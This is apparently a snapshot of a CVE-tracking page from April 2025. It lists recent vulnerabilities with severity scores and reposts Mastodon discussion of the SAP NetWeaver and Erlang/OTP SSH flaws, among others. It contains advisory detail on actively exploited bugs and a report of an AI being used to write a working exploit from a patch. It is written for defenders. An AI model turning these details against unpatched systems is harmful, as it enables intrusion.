## Updated at UTC 2025-04-26T05:03:55.977040

Access data as JSON

CVE CVSS EPSS Posts Repos Nuclei Updated Description
CVE-2025-31324 10.0 0.04% 9 1 2025-04-26T01:15:41.930000 SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper a
CVE-2025-32433 10.0 3.62% 16 17 template 2025-04-25T23:15:16.993000 Erlang/OTP is a set of libraries for the Erlang programming language. Prior to v
CVE-2025-3935 8.1 0.00% 2 0 2025-04-25T21:31:39 ScreenConnect versions 25.2.3 and earlier versions may be susceptible to a ViewS
CVE-2025-2069 5.0 0.00% 2 0 2025-04-25T18:31:19 A cross-site scripting vulnerability was reported in the FileZ client that could
CVE-2025-3928 8.8 0.00% 2 0 2025-04-25T18:31:12 Commvault Web Server has an unspecified vulnerability that can be exploited by a
CVE-2025-3634 4.3 0.00% 4 0 2025-04-25T16:30:58 A security vulnerability was discovered in Moodle that allows students to enroll
CVE-2024-6199 None 0.00% 2 0 2025-04-25T15:31:29 An unauthenticated attacker on the WAN interface, with the ability to intercept
CVE-2024-6198 None 0.00% 4 0 2025-04-25T15:31:29 The device exposes a web interface on ports TCP/3030 and TCP/9882. This web serv
CVE-2025-43946 9.8 0.29% 1 0 2025-04-25T15:31:21 TCPWave DDI 11.34P1C2 allows Remote Code Execution via Unrestricted File Upload
CVE-2025-32431 None 0.07% 1 0 2025-04-25T14:41:50 ## Impact There is a potential vulnerability in Traefik managing the requests u
CVE-2025-46616 10.0 0.18% 1 0 2025-04-25T09:31:56 Quantum StorNext Web GUI API before 7.2.4 allows potential Arbitrary Remote Code
CVE-2025-43859 9.1 0.03% 1 0 2025-04-24T21:41:39 ### Impact A leniency in h11's parsing of line terminators in chunked-coding me
CVE-2024-32752 9.1 0.21% 1 0 2025-04-24T21:32:50 Under certain circumstances communications between the ICU tool and an iSTAR Pro
CVE-2025-26382 None 0.04% 2 0 2025-04-24T21:31:54 Under certain circumstances the iSTAR Configuration Utility (ICU) tool could hav
CVE-2025-43858 9.2 0.02% 1 0 2025-04-24T19:20:07 ## Summary This vulnerability only apply when running on a Windows OS. An unsafe
CVE-2025-43928 5.8 0.04% 2 0 2025-04-24T18:32:12 In Infodraw Media Relay Service (MRS) 7.1.0.0, the MRS web server (on port 12654
CVE-2025-28020 7.3 0.04% 1 0 2025-04-24T18:32:10 TOTOLINK A800R V4.1.2cu.5137_B20200730 was found to contain a buffer overflow vu
CVE-2025-28021 7.3 0.04% 1 0 2025-04-24T18:32:10 TOTOLINK A810R V4.1.2cu.5182_B20201026 was found to contain a buffer overflow vu
CVE-2025-28028 7.3 0.04% 1 0 2025-04-24T18:32:10 TOTOLINK A830R V4.1.2cu.5182_B20201102, A950RG V4.1.2cu.5161_B20200903, A3000RU
CVE-2025-28022 7.3 0.04% 1 0 2025-04-24T18:32:10 TOTOLINK A810R V4.1.2cu.5182_B20201026 was found to contain a buffer overflow vu
CVE-2025-27820 7.5 0.01% 1 0 2025-04-24T16:36:11 A bug in PSL validation logic in Apache HttpClient 5.4.x disables domain checks,
CVE-2025-43919 5.8 0.16% 3 2 2025-04-24T16:22:37.117000 GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attac
CVE-2025-43920 5.4 0.12% 2 1 2025-04-24T16:20:36.953000 GNU Mailman 2.1.39, as bundled in cPanel (and WHM), in certain external archiver
CVE-2025-43921 5.3 0.03% 3 1 2025-04-24T16:16:59.597000 GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attac
CVE-2025-43855 None 0.07% 1 0 2025-04-24T16:03:58 ### Summary An unhandled error is thrown when validating invalid connectionPara
CVE-2025-30408 6.7 0.01% 1 0 2025-04-24T15:31:46 Local privilege escalation due to insecure folder permissions. The following pro
CVE-2025-46421 6.8 0.03% 1 0 2025-04-24T15:31:44 A flaw was found in libsoup. When libsoup clients encounter an HTTP redirect, th
CVE-2025-30409 5.5 0.01% 1 0 2025-04-24T15:31:44 Denial of service due to allocation of resources without limits. The following p
CVE-2025-3872 7.2 0.02% 1 0 2025-04-24T12:31:35 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti
CVE-2024-12244 4.3 0.01% 1 0 2025-04-24T09:30:40 An issue has been discovered in access controls could allow users to view certai
CVE-2025-1908 7.7 0.01% 1 0 2025-04-24T09:30:40 An issue has been discovered in GitLab EE/CE that could allow an attacker to tra
CVE-2025-0639 6.5 0.03% 1 0 2025-04-24T09:30:40 An issue has been discovered affecting service availability via issue preview in
CVE-2025-32730 5.5 0.03% 1 0 2025-04-24T09:30:40 Use of hard-coded cryptographic key vulnerability in i-PRO Configuration Tool af
CVE-2025-1731 7.8 0.01% 4 0 2025-04-24T06:30:31 An incorrect permission assignment vulnerability in the PostgreSQL commands of t
CVE-2025-1976 None 0.03% 1 0 2025-04-24T03:31:38 Brocade Fabric OS versions starting with 9.1.0 have root access removed, however
CVE-2025-46419 5.9 0.06% 1 0 2025-04-24T03:31:38 Westermo WeOS 5 through 5.23.0 allows a reboot via a malformed ESP packet.
CVE-2025-32818 7.5 0.04% 1 0 2025-04-23T21:30:42 A Null Pointer Dereference vulnerability in the SonicOS SSLVPN Virtual office in
CVE-2025-32969 None 0.24% 1 0 2025-04-23T19:15:38 ### Impact It is possible for a remote unauthenticated user to escape from the
CVE-2025-2773 7.2 0.33% 1 0 2025-04-23T18:31:07 BEC Technologies Multiple Routers sys ping Command Injection Remote Code Executi
CVE-2025-2772 5.3 0.03% 1 0 2025-04-23T18:31:07 BEC Technologies Multiple Routers Insufficiently Protected Credentials Informati
CVE-2025-2770 4.9 0.10% 1 0 2025-04-23T18:31:06 BEC Technologies Multiple Routers Cleartext Password Storage Information Disclos
CVE-2025-2771 5.3 0.10% 1 0 2025-04-23T18:31:06 BEC Technologies Multiple Routers Authentication Bypass Vulnerability. This vuln
CVE-2025-2767 8.8 0.21% 1 0 2025-04-23T18:31:00 Arista NG Firewall User-Agent Cross-Site Scripting Remote Code Execution Vulnera
CVE-2025-27087 5.5 0.01% 1 0 2025-04-23T15:32:02 A vulnerability in the kernel of the Cray Operating System (COS) could allow an
CVE-2024-33452 7.7 0.11% 1 0 2025-04-23T14:08:13.383000 An issue in OpenResty lua-nginx-module v.0.10.26 and before allows a remote atta
CVE-2025-1951 8.4 0.01% 1 0 2025-04-23T14:08:13.383000 IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 co
CVE-2025-29660 9.8 0.07% 1 0 2025-04-23T14:08:13.383000 A vulnerability exists in the daemon process of the Yi IOT XY-3820 v6.0.24.10, w
CVE-2025-29659 9.8 0.21% 1 0 2025-04-23T14:08:13.383000 Yi IOT XY-3820 6.0.24.10 is vulnerable to Remote Command Execution via the "cmd_
CVE-2025-2703 6.8 0.01% 2 0 2025-04-23T12:31:31 The built-in XY Chart plugin is vulnerable to a DOM XSS vulnerability. A user
CVE-2025-2595 5.3 0.02% 1 0 2025-04-23T09:33:37 An unauthenticated remote attacker can bypass the user management in CODESYS Vis
CVE-2025-0926 5.9 0.01% 1 0 2025-04-23T06:31:26 Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has found that
CVE-2025-1056 6.1 0.01% 1 0 2025-04-23T06:31:26 Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has identified
CVE-2025-46221 None 0.00% 1 0 2025-04-23T03:30:35 Rejected reason: Not used
CVE-2025-1021 7.5 0.04% 1 0 2025-04-23T03:30:30 Missing authorization vulnerability in synocopy in Synology DiskStation Manager
CVE-2025-32965 None 0.04% 1 1 2025-04-22T23:53:56 ### Impact Versions 4.2.1, 4.2.2, 4.2.3, and 4.2.4 of xrpl.js were compromised a
CVE-2025-34028 10.0 0.31% 13 2 2025-04-22T18:32:18 A path traversal vulnerability in Commvault Command Center Innovation Release al
CVE-2025-27086 8.1 0.06% 2 0 2025-04-22T15:31:59 Vulnerability in Hewlett Packard Enterprise HPE Performance Cluster Manager (HPC
CVE-2025-1950 9.4 0.01% 2 0 2025-04-22T15:30:58 IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 co
CVE-2025-1732 6.7 0.01% 1 0 2025-04-22T03:30:32 An improper privilege management vulnerability in the recovery function of the U
CVE-2025-43972 6.8 0.06% 1 0 2025-04-21T21:55:34 An issue was discovered in GoBGP before 3.35.0. An attacker can cause a crash in
CVE-2025-43971 8.6 0.04% 1 0 2025-04-21T21:55:26 An issue was discovered in GoBGP before 3.35.0. pkg/packet/bgp/bgp.go allows att
CVE-2025-43970 4.3 0.02% 1 0 2025-04-21T21:55:19 An issue was discovered in GoBGP before 3.35.0. pkg/packet/mrt/mrt.go does not p
CVE-2025-32408 2.5 0.01% 1 0 2025-04-21T17:15:24.117000 In Soffid Console 3.6.31 before 3.6.32, authorization to use the pam service is
CVE-2025-43916 3.4 0.03% 1 0 2025-04-21T14:23:45.950000 Sonos api.sonos.com through 2025-04-21, when the /login/v3/oauth endpoint is use
CVE-2025-43973 6.8 0.04% 1 0 2025-04-21T14:23:45.950000 An issue was discovered in GoBGP before 3.35.0. pkg/packet/rtr/rtr.go does not v
CVE-2025-43918 6.4 0.01% 1 0 2025-04-20T00:31:48 SSL.com before 2025-04-19, when domain validation method 3.2.2.4.14 is used, pro
CVE-2025-3803 8.8 0.05% 1 0 2025-04-19T15:30:28 A vulnerability was found in Tenda W12 and i24 3.0.0.4(2887)/3.0.0.5(3644). It h
CVE-2025-3802 8.8 0.05% 1 0 2025-04-19T15:30:23 A vulnerability was found in Tenda W12 and i24 3.0.0.4(2887)/3.0.0.5(3644). It h
CVE-2025-32434 None 0.41% 2 0 2025-04-18T18:34:25 # Description I found a Remote Command Execution (RCE) vulnerability in the PyTo
CVE-2025-42599 9.8 0.30% 2 0 2025-04-18T15:31:44 Active! mail 6 BuildInfo: 6.60.05008561 and earlier contains a stack-based buffe
CVE-2025-24054 6.5 17.54% 4 3 2025-04-18T14:15:17.677000 External control of file name or path in Windows NTLM allows an unauthorized att
CVE-2025-2567 9.8 0.05% 1 0 2025-04-15T21:31:48 An attacker could modify or disable settings, disrupt fuel monitoring and suppl
CVE-2025-3587 6.3 0.04% 1 0 2025-04-15T18:39:27.967000 A vulnerability classified as critical was found in ZeroWdd/code-projects studen
CVE-2025-33028 6.1 0.04% 1 0 2025-04-15T18:31:58 In WinZip through 29.0, there is a Mark-of-the-Web Bypass Vulnerability because
CVE-2025-2636 9.8 0.25% 1 0 2025-04-11T15:39:52.920000 The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vul
CVE-2025-0120 0 0.02% 1 0 2025-04-11T15:39:52.920000 A vulnerability with a privilege management mechanism in the Palo Alto Networks
CVE-2025-3248 9.8 80.91% 2 4 template 2025-04-10T01:59:49 Langflow versions prior to 1.3.0 are susceptible to code injection in the `/api/
CVE-2025-21204 7.8 0.07% 4 0 2025-04-08T18:34:49 Improper link resolution before file access ('link following') in Windows Update
CVE-2024-48887 9.8 0.09% 1 2 2025-04-08T18:34:48 A unverified password change vulnerability in Fortinet FortiSwitch GUI may allo
CVE-2025-29927 9.1 92.56% 1 81 template 2025-03-28T15:32:59 # Impact It is possible to bypass authorization checks within a Next.js applicat
CVE-2024-54085 None 0.11% 1 0 2025-03-28T15:32:58 AMI’s SPx contains a vulnerability in the BMC where an Attacker may bypass authe
CVE-2025-1974 9.8 80.23% 1 17 template 2025-03-25T15:10:16 A security issue was discovered in Kubernetes where under certain conditions, an
CVE-2025-27840 6.8 0.07% 1 3 2025-03-11T18:32:12 Espressif ESP32 chips allow 29 hidden HCI commands, such as 0xFC02 (Write memory
CVE-2025-27610 7.5 0.09% 6 0 2025-03-10T23:15:35.073000 Rack provides an interface for developing web applications in Ruby. Prior to ver
CVE-2025-0725 7.3 0.21% 1 0 2025-03-07T03:31:33 When libcurl is asked to perform automatic gzip decompression of content-encoded
CVE-2025-27111 0 0.12% 4 0 2025-03-04T16:15:40.487000 Rack is a modular Ruby web server interface. The Rack::Sendfile middleware logs
CVE-2022-42475 9.8 93.18% 1 7 2025-02-24T18:32:12 A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 th
CVE-2025-25184 0 0.10% 4 0 2025-02-14T20:15:34.350000 Rack provides an interface for developing web applications in Ruby. Prior to ver
CVE-2025-0282 9.1 92.34% 7 10 2025-01-28T18:32:27 A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5,
CVE-2018-0171 9.8 89.10% 1 2 2025-01-27T21:31:51 A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS
CVE-2024-21762 9.8 91.37% 1 8 2024-11-29T15:23:32.167000 A out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 th
CVE-2024-9441 9.8 57.36% 1 4 2024-10-02T21:30:35 The Linear eMerge e3-Series through version 1.00-07 is vulnerable to an OS comma
CVE-2024-6235 None 21.21% 1 0 template 2024-07-31T05:02:58 Sensitive information disclosure in NetScaler Console
CVE-2020-5902 9.8 94.44% 1 57 template 2024-07-25T18:33:36 In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.
CVE-2024-6407 9.8 0.14% 1 0 2024-07-11T12:30:56 CWE-200: Information Exposure vulnerability exists that could cause disclosure o
CVE-2023-27997 9.8 91.01% 1 10 2024-04-04T04:45:33 A heap-based buffer overflow vulnerability [CWE-122] in FortiOS version 7.2.4 an
CVE-2024-3094 10.0 90.84% 1 62 template 2024-03-29T18:30:50 Malicious code was discovered in the upstream tarballs of xz, starting with vers
CVE-2022-42889 9.8 94.16% 1 49 template 2024-01-19T20:49:34 Apache Commons Text performs variable interpolation, allowing properties to be d
CVE-2025-3132 0 0.00% 2 1 N/A
CVE-2025-22234 0 0.00% 3 0 N/A
CVE-2025-1763 0 0.00% 1 0 N/A
CVE-2025-2443 0 0.00% 1 0 N/A
CVE-2024-55571 0 0.00% 1 0 N/A
CVE-2025-21605 0 0.03% 1 0 N/A
CVE-2025-32966 0 0.04% 1 0 N/A
CVE-2025-32958 0 0.04% 1 0 N/A
CVE-2025-32438 0 0.01% 1 0 N/A

CVE-2025-31324
(10.0 CRITICAL)

EPSS: 0.04%

updated 2025-04-26T01:15:41.930000

9 posts

SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.

1 repos

https://github.com/rxerium/CVE-2025-31324

patrickcmiller at 2025-04-25T21:12:12.826Z ##

SAP zero-day vulnerability under widespread active exploitation cyberscoop.com/sap-netweaver-z

##

AAKL at 2025-04-25T16:48:43.342Z ##

More about the SAP NetWeaver zero-day vulnerability. A patch has been released.

Tenable: CVE-2025-31324: Zero-Day Vulnerability in SAP NetWeaver Exploited in the Wild tenable.com/blog/cve-2025-3132 @tenable

##

cR0w at 2025-04-25T14:29:09.143Z ##

@campuscodi I have heard that CVE-2025-31324 is in fact under active exploitation. I haven't heard confirmation that the exploitation observed by ReliaQuest in that article is it, but at this point, it doesn't ( or at least shouldn't ) matter to defenders.

##

patrickcmiller@infosec.exchange at 2025-04-25T21:12:12.000Z ##

SAP zero-day vulnerability under widespread active exploitation cyberscoop.com/sap-netweaver-z

##

AAKL@infosec.exchange at 2025-04-25T16:48:43.000Z ##

More about the SAP NetWeaver zero-day vulnerability. A patch has been released.

Tenable: CVE-2025-31324: Zero-Day Vulnerability in SAP NetWeaver Exploited in the Wild tenable.com/blog/cve-2025-3132 @tenable #cybersecurity #infosec #zeroday

##

cR0w@infosec.exchange at 2025-04-25T14:29:09.000Z ##

@campuscodi I have heard that CVE-2025-31324 is in fact under active exploitation. I haven't heard confirmation that the exploitation observed by ReliaQuest in that article is it, but at this point, it doesn't ( or at least shouldn't ) matter to defenders.

##

jbhall56@infosec.exchange at 2025-04-25T10:53:23.000Z ##

Tracked as CVE-2025-31324 (CVSS score of 10/10), the security defect is described as the lack of proper authorization (missing authorization check) in the Visual Composer Metadata Uploader component of SAP NetWeaver. securityweek.com/sap-zero-day-

##

DarkWebInformer@infosec.exchange at 2025-04-24T19:15:01.000Z ##

🚨SAP NetWeaver Vulnerability (CVE-2025-31324) Allows Remote Code Execution via File Upload Flaw

darkwebinformer.com/sap-netwea

##

cR0w@infosec.exchange at 2025-04-24T17:20:17.000Z ##

A perfect 10 in SAP NetWeaver? Yes please. 🥳

me.sap.com/notes/3594142

sev:CRIT 10.0 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.

nvd.nist.gov/vuln/detail/CVE-2

##

cR0w at 2025-04-25T21:22:47.096Z ##

Cisco updated the list again. Here are the currently listed Cisco system vulnerable to the Erlang / OTP perfect 10 CVE-2025-32433 ( additions in bold:

  • ConfD, ConfD Basic
  • Network Services Orchestrator (NSO)
  • Smart PHY
  • Ultra Services Platform
  • ASR 5000 Series Software (StarOS) and Ultra Packet Core
  • Cloud Native Broadband Network Gateway
  • iNode Manager ( No fix planned. )
  • Ultra Cloud Core - Access and Mobility Management Function
  • Ultra Cloud Core - Policy Control Function
  • Ultra Cloud Core - Redundancy Configuration Manager
  • Ultra Cloud Core - Session Management Function
  • Ultra Cloud Core - Subscriber Microservices Infrastructure
  • Enterprise NFV Infrastructure Software (NFVIS)
  • Small Business RV Series Routers RV160, RV160W, RV260, RV260P, RV260W, RV340, RV340W, RV345, RV345P ( No fix planned. )

The products still being evaluated, hopefully to be complete by EoD today ( my hope, nothing hinting to that from Cisco ):

  • Wide Area Application Services (WAAS) Software
##

AAKL at 2025-04-25T16:00:17.041Z ##

This was updated yesterday.

Cisco: Multiple Cisco Products Unauthenticated Remote Code Execution in Erlang/OTP SSH Server - CVE-2025-32433: April 2025 (critical) sec.cloudapps.cisco.com/securi @TalosSecurity

##

cR0w at 2025-04-25T13:39:46.629Z ##

For those playing along at home, here are the currently listed Cisco system vulnerable to the Erlang / OTP perfect 10 CVE-2025-32433:

  • ConfD, ConfD Basic
  • Network Services Orchestrator (NSO)
  • Smart PHY
  • ASR 5000 Series Software (StarOS) and Ultra Packet Core
  • iNode Manager ( No fix planned. )
  • Ultra Cloud Core - Access and Mobility Management Function
  • Ultra Cloud Core - Redundancy Configuration Manager
  • Ultra Cloud Core - Session Management Function
  • Ultra Cloud Core - Subscriber Microservices Infrastructure
  • Enterprise NFV Infrastructure Software (NFVIS)
  • Small Business RV Series Routers RV160, RV160W, RV260, RV260P, RV260W, RV340, RV340W, RV345, RV345P ( No fix planned. )

The products still being evaluated, hopefully to be complete by EoD today ( my hope, nothing hinting to that from Cisco ):

  • Wide Area Application Services (WAAS) Software
  • Virtualized Infrastructure Manager
  • Catalyst Center, formerly DNA Center
  • Ultra Cloud Core - Policy Control Function
##

cR0w@infosec.exchange at 2025-04-25T21:22:47.000Z ##

Cisco updated the list again. Here are the currently listed Cisco system vulnerable to the Erlang / OTP perfect 10 CVE-2025-32433 ( additions in bold:

  • ConfD, ConfD Basic
  • Network Services Orchestrator (NSO)
  • Smart PHY
  • Ultra Services Platform
  • ASR 5000 Series Software (StarOS) and Ultra Packet Core
  • Cloud Native Broadband Network Gateway
  • iNode Manager ( No fix planned. )
  • Ultra Cloud Core - Access and Mobility Management Function
  • Ultra Cloud Core - Policy Control Function
  • Ultra Cloud Core - Redundancy Configuration Manager
  • Ultra Cloud Core - Session Management Function
  • Ultra Cloud Core - Subscriber Microservices Infrastructure
  • Enterprise NFV Infrastructure Software (NFVIS)
  • Small Business RV Series Routers RV160, RV160W, RV260, RV260P, RV260W, RV340, RV340W, RV345, RV345P ( No fix planned. )

The products still being evaluated, hopefully to be complete by EoD today ( my hope, nothing hinting to that from Cisco ):

  • Wide Area Application Services (WAAS) Software
##

AAKL@infosec.exchange at 2025-04-25T16:00:17.000Z ##

This was updated yesterday.

Cisco: Multiple Cisco Products Unauthenticated Remote Code Execution in Erlang/OTP SSH Server - CVE-2025-32433: April 2025 (critical) sec.cloudapps.cisco.com/securi @TalosSecurity #cybersecurity #infosec

##

cR0w@infosec.exchange at 2025-04-25T13:39:46.000Z ##

For those playing along at home, here are the currently listed Cisco system vulnerable to the Erlang / OTP perfect 10 CVE-2025-32433:

  • ConfD, ConfD Basic
  • Network Services Orchestrator (NSO)
  • Smart PHY
  • ASR 5000 Series Software (StarOS) and Ultra Packet Core
  • iNode Manager ( No fix planned. )
  • Ultra Cloud Core - Access and Mobility Management Function
  • Ultra Cloud Core - Redundancy Configuration Manager
  • Ultra Cloud Core - Session Management Function
  • Ultra Cloud Core - Subscriber Microservices Infrastructure
  • Enterprise NFV Infrastructure Software (NFVIS)
  • Small Business RV Series Routers RV160, RV160W, RV260, RV260P, RV260W, RV340, RV340W, RV345, RV345P ( No fix planned. )

The products still being evaluated, hopefully to be complete by EoD today ( my hope, nothing hinting to that from Cisco ):

  • Wide Area Application Services (WAAS) Software
  • Virtualized Infrastructure Manager
  • Catalyst Center, formerly DNA Center
  • Ultra Cloud Core - Policy Control Function
##

jbhall56@infosec.exchange at 2025-04-25T11:25:42.000Z ##

Cisco is investigating the impact of the Erlang/OTP remote code execution vulnerability CVE-2025-32433 on its products. securityweek.com/cisco-confirm

##

hdm@infosec.exchange at 2025-04-24T04:50:42.000Z ##

A few quick notes on the Erlang OTP SSHd RCE (CVE-2025-32433):

1. Cisco confirmed that ConfD and NSO products are affected (ports 830, 2022, and 2024 versus 22)

2. Signatures looking for clear-text channel open and exec calls will miss exploits that deliver the same payloads after the key exchange.

3. If you find a machine in your environment and can't disable the service, running the exploit with the payload `ssh:stop().` will shut down the SSH service temporarily.

runzero.com/blog/erlang-otp-ss

##

sambowne@infosec.exchange at 2025-04-23T23:23:37.000Z ##

How I Used AI to Create a Working Exploit for CVE-2025-32433 Before Public PoCs Existed | Platform Security Blog platformsecurity.com/blog/CVE-

##

AAKL@infosec.exchange at 2025-04-23T17:07:37.000Z ##

Cisco, published yesterday (critical): Multiple Cisco Products Unauthenticated Remote Code Execution in Erlang/OTP SSH Server - CVE-2025-32433 sec.cloudapps.cisco.com/securi @TalosSecurity #cybersecurity #infosec

##

cR0w@infosec.exchange at 2025-04-23T13:47:11.000Z ##

If your company sells a product with limited visibility into the underlying systems ( network appliances, etc. ) and you have not yet published an advisory or doc stating whether or not your products are impacted by the Erlang / OTP perfect 10 CVE-2025-32433, then you are not my friend and I hope you step on a lego in the middle of the night.

##

researchbuzz_firehose@rbfirehose.com at 2025-04-23T08:14:16.000Z ##

The Register: Today’s LLMs craft exploits from patches at lightning speed . “Matthew Keely, of Platform Security and penetration testing firm ProDefense, managed to cobble together a working exploit for a critical vulnerability in Erlang’s SSH library (CVE-2025-32433) in an afternoon, although the AI he used had some help – the model was able to use code from an already published patch in the […]

https://rbfirehose.com/2025/04/23/the-register-todays-llms-craft-exploits-from-patches-at-lightning-speed/

##

jos1264@social.skynetcloud.site at 2025-04-22T12:15:03.000Z ##

PoC exploit for critical Erlang/OTP SSH bug is public (CVE-2025-32433) helpnetsecurity.com/2025/04/22 #RuhrUniversityBochum #ArcticWolfNetworks #PlatformSecurity #vulnerability #Horizon3ai #ProDefense #Don'tmiss #Hotstuff #exploit #News #PoC #SSH

##

jos1264@social.skynetcloud.site at 2025-04-21T22:10:02.000Z ##

Erlang/OTP RCE (CVE-2025-32433) fortiguard.fortinet.com/threat

##

oversecurity@mastodon.social at 2025-04-19T21:10:09.000Z ##

Critical Erlang/OTP SSH RCE bug now has public exploits, patch now

Public exploits are now available for a critical Erlang/OTP SSH vulnerability tracked as CVE-2025-32433, allowing unauthenticated attackers to...

🔗️ [Bleepingcomputer] link.is.it/weapzq

##

AAKL@infosec.exchange at 2025-04-19T15:46:36.000Z ##

Picus: CVE-2025-32433: Erlang/OTP SSH Remote Code Execution Vulnerability Explained picussecurity.com/resource/blo #cybersecurity #Infosec

##

CVE-2025-3935
(8.1 HIGH)

EPSS: 0.00%

updated 2025-04-25T21:31:39

2 posts

ScreenConnect versions 25.2.3 and earlier versions may be susceptible to a ViewState code injection attack. ASP.NET Web Forms use ViewState to preserve page and control state, with data encoded using Base64 protected by machine keys.  It is important to note that to obtain these machine keys, privileged system level access must be obtained. If these machine keys are compromised, attackers coul

cR0w at 2025-04-25T18:46:40.755Z ##

Looks like there's a CVE for yesterday's ScreenConnect vuln now.

nvd.nist.gov/vuln/detail/CVE-2

##

cR0w@infosec.exchange at 2025-04-25T18:46:40.000Z ##

Looks like there's a CVE for yesterday's ScreenConnect vuln now.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-2069
(5.0 MEDIUM)

EPSS: 0.00%

updated 2025-04-25T18:31:19

2 posts

A cross-site scripting vulnerability was reported in the FileZ client that could allow execution of code if a crafted url is visited by a local user.

cR0w at 2025-04-25T16:15:42.091Z ##

Three vulns published in FileZ, all sev:MED 5.1 but this one sounded more interesting:

FileZ 客户端报告了一个跨站脚本攻击漏洞,如果本地用户访问伪造的链接,则可能会执行代码。CVE-2025-2069

Translation via LibreWolf:

The FileZ client reported a cross-site scripting vulnerability that could execute code if a local user accesses a forged link. CVE-2025-2069

filez.com/securityPolicy/2.htm

##

cR0w@infosec.exchange at 2025-04-25T16:15:42.000Z ##

Three vulns published in FileZ, all sev:MED 5.1 but this one sounded more interesting:

FileZ 客户端报告了一个跨站脚本攻击漏洞,如果本地用户访问伪造的链接,则可能会执行代码。CVE-2025-2069

Translation via LibreWolf:

The FileZ client reported a cross-site scripting vulnerability that could execute code if a local user accesses a forged link. CVE-2025-2069

filez.com/securityPolicy/2.htm

##

CVE-2025-3928
(8.8 HIGH)

EPSS: 0.00%

updated 2025-04-25T18:31:12

2 posts

Commvault Web Server has an unspecified vulnerability that can be exploited by a remote, authenticated attacker. According to the Commvault advisory: "Webservers can be compromised through bad actors creating and executing webshells." Fixed in version 11.36.46, 11.32.89, 11.28.141, and 11.20.217 for Windows and Linux platforms.

cR0w at 2025-04-25T16:55:18.640Z ##

CVE published for a Commvault advisory from last month about "an unspecifiec vulnerability".

documentation.commvault.com/se

sev:HIGH 8.7 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Commvault Web Server has an unspecified vulnerability that can be exploited by a remote, authenticated attacker. According to the Commvault advisory: "Webservers can be compromised through bad actors creating and executing webshells." Fixed in version 11.36.46, 11.32.89, 11.28.141, and 11.20.217 for Windows and Linux platforms.

nvd.nist.gov/vuln/detail/CVE-2

##

cR0w@infosec.exchange at 2025-04-25T16:55:18.000Z ##

CVE published for a Commvault advisory from last month about "an unspecifiec vulnerability".

documentation.commvault.com/se

sev:HIGH 8.7 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Commvault Web Server has an unspecified vulnerability that can be exploited by a remote, authenticated attacker. According to the Commvault advisory: "Webservers can be compromised through bad actors creating and executing webshells." Fixed in version 11.36.46, 11.32.89, 11.28.141, and 11.20.217 for Windows and Linux platforms.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-3634
(4.3 MEDIUM)

EPSS: 0.00%

updated 2025-04-25T16:30:58

4 posts

A security vulnerability was discovered in Moodle that allows students to enroll themselves in courses without completing all the necessary safety checks. Specifically, users can sign up for courses prematurely, even if they haven't finished two-step verification processes.

darisan@openbiblio.social at 2025-04-25T19:30:14.000Z ##

"Zu viel Interesse an Moodle-Kursen" ist eher kein so gängiges Sicherheitsproblem an Unis, oder? access.redhat.com/security/cve #Moodle #CVE

##

cR0w at 2025-04-25T15:25:23.690Z ##

Who wants to skip courses in Moodle?

access.redhat.com/security/cve

A security vulnerability was discovered in Moodle that allows students to enroll themselves in courses without completing all the necessary safety checks. Specifically, users can sign up for courses prematurely, even if they haven't finished two-step verification processes.

##

darisan@openbiblio.social at 2025-04-25T19:30:14.000Z ##

"Zu viel Interesse an Moodle-Kursen" ist eher kein so gängiges Sicherheitsproblem an Unis, oder? access.redhat.com/security/cve #Moodle #CVE

##

cR0w@infosec.exchange at 2025-04-25T15:25:23.000Z ##

Who wants to skip courses in Moodle?

access.redhat.com/security/cve

A security vulnerability was discovered in Moodle that allows students to enroll themselves in courses without completing all the necessary safety checks. Specifically, users can sign up for courses prematurely, even if they haven't finished two-step verification processes.

##

CVE-2024-6199(CVSS UNKNOWN)

EPSS: 0.00%

updated 2025-04-25T15:31:29

2 posts

An unauthenticated attacker on the WAN interface, with the ability to intercept Dynamic DNS (DDNS) traffic between DDNS services and the modem, could manipulate specific responses to include code that forces a buffer overflow on the modem. Customers that have not enabled Dynamic DNS on their modem are not vulnerable.

cR0w at 2025-04-25T13:47:43.282Z ##

Who doesn't like RCE in Viastat modems? Well here's two of them. Happy Friday.

onekey.com/resource/security-a

sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:Y/R:U/V:C/RE:M/U:Red

The device exposes a web interface on ports TCP/3030 and TCP/9882. This web service runs lighttpd, which implements the “SNORE” interface. This interface is affected by a stack buffer overflow vulnerability due to insecure path parsing. An attacker with access to the LAN network interface could use a specially crafted HTTP request to exploit a buffer overflow on the modem.

nvd.nist.gov/vuln/detail/CVE-2

onekey.com/resource/security-a

sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:N/R:U/V:D/RE:M/U:Red

